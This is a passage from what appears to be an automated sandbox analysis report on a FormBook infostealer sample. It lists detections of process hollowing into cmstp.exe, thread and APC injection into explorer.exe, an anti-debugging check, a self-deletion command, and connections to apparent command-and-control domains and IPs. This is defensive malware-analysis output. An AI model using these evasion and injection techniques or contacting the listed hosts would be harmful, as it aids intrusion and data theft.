          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0474740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0474740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0474740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_047314FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046758EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04748CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04679080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04697D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04748D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04694120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04694120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04694120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04694120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04694120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0473E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046FA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04679100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04679100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04679100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04728DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0473FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0473FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0473FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0473FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_047041E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_047405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_047405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04672D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04672D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04672D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04672D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04672D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0472B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0472B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04748A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0473EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04679240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04679240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04679240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04679240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04704257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04687E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04687E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04687E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04687E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04687E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04687E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0473AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0473AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0472FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04688A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04693A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04675210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04675210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04675210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04675210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046876E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04748ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0472FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04740EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04740EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04740EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04748F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04748B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04674F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04674F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmstp.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.huongdandidong.com
          Source: C:\Windows\explorer.exeDomain query: www.opusleaf.com
          Source: C:\Windows\explorer.exeDomain query: www.luxel01.com
          Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80
          Source: C:\Windows\explorer.exeNetwork Connect: 5.101.152.161 80
          Source: C:\Windows\explorer.exeDomain query: www.simplyhealrhcareplans.com
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exeNetwork Connect: 108.186.210.142 80
          Source: C:\Windows\explorer.exeDomain query: www.myboardinghome.com
          Source: C:\Windows\explorer.exeNetwork Connect: 3.223.115.185 80
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.242.153 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80
          Source: C:\Windows\explorer.exeNetwork Connect: 144.76.207.76 80
          Source: C:\Windows\explorer.exeDomain query: www.seymor-law.com
          Source: C:\Windows\explorer.exeDomain query: www.muzhskoy-eskort.site
          Source: C:\Windows\explorer.exeDomain query: www.shopthen2.site
          Source: C:\Windows\explorer.exeNetwork Connect: 118.27.122.19 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.lewishackney.com
          Source: C:\Windows\explorer.exeDomain query: www.ecomcourse.online
          Source: C:\Windows\explorer.exeDomain query: www.karizcustomizeme.com
          Source: C:\Windows\explorer.exeDomain query: www.anadelalastra.art
          Source: C:\Windows\explorer.exeDomain query: www.orchidandiris.com
          Contains functionality to prevent local Windows debuggingShow sources
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_737F1000 Hyvkfcorf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeSection loaded: unknown target: C:\Users\user\Desktop\LWlcpDjYIQ.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\cmstp.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeSection unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 220000
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeProcess created: C:\Users\user\Desktop\LWlcpDjYIQ.exe 'C:\Users\user\Desktop\LWlcpDjYIQ.exe'
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\LWlcpDjYIQ.exe'
          Source: explorer.exe, 00000005.00000000.220055270.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000005.00000000.220307283.0000000001980000.00000002.00000001.sdmp, cmstp.exe, 00000007.00000002.476143655.0000000002F00000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.220307283.0000000001980000.00000002.00000001.sdmp, cmstp.exe, 00000007.00000002.476143655.0000000002F00000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.220307283.0000000001980000.00000002.00000001.sdmp, cmstp.exe, 00000007.00000002.476143655.0000000002F00000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.220307283.0000000001980000.00000002.00000001.sdmp, cmstp.exe, 00000007.00000002.476143655.0000000002F00000.00000002.00000001.sdmpBinary or memory string: Progmanlock

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, type: MEMORY
